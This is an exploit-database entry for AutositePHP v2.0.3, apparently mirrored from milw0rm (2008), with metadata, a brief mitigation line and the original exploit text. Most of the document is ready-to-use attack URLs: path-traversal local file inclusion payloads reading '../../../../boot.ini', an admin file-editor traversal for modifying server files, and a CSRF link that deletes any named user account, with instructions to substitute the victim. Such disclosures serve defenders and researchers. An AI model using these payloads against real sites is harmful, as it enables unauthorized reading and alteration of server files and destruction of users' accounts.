AutositePHP v2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities

vendor:

AutositePHP

by:

SirGod

8.8

CVSS

HIGH

Local File Inclusion, Cross Site Request Forgery, Edit File

22, 352, 264

CWE

Product Name: AutositePHP

Affected Version From: 2.0.3

Affected Version To: 2.0.3

Patch Exists: NO

Related CWE: N/A

CPE: a:autositephp:autositephp:2.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

AutositePHP v2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities

AutositePHP v2.0.3 is vulnerable to Local File Inclusion, Cross Site Request Forgery and Edit File. An attacker can exploit these vulnerabilities to gain access to sensitive information, delete user accounts and modify files on the webserver.

Mitigation:

Ensure that user input is properly sanitized and validated. Implement access control mechanisms to restrict access to sensitive information and administrative functions.

Source

Exploit-DB raw data:

############################################################################################
[+] AutositePHP v2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] Greetz : All my friends
[+] Download Script : http://sourceforge.net/projects/autositephp/
############################################################################################

[+] Local File Inclusion

    PoC 1 :

      http://[target]/[path]/index.php?page=users/[Local File]

    Example 1 :

      http://127.0.0.1/path/index.php?page=users/../../../../boot.ini


    PoC 2 :

      http://[target]/[path]/index.php?page=users/login.php&update=update/[Local
File]

    Example 1 :

      http://127.0.0.1/path/index.php?page=users/login.php&update=update/../../../../boot.ini


[+] Edit File

 - Need administrative permissions.You can edit files from the webserver.

    PoC :

      http://[target]/[path]/pages/Admin/File%20Editor/actions/modify.php?page=pages/[Local
File]

    Example :

      http://127.0.0.1/path/pages/Admin/File%20Editor/actions/modify.php?page=pages/../../../../boot.ini


[+] Cross Site Request Forgery


  If a logged in user with administrator privileges clicks on the
following url :

     http://127.0.0.1/path/index.php?page=pages/Admin/Users/viewusers/delete.php&username=SirGod&submit=submit

  The username SirGod will be deleted.You can change the username to another.

     http://127.0.0.1/path/index.php?page=pages/Admin/Users/viewusers/delete.php&username=[USERNAME]&submit=submit

[USERNAME] = name of account that you want to delete.


############################################################################################

# milw0rm.com [2008-12-14]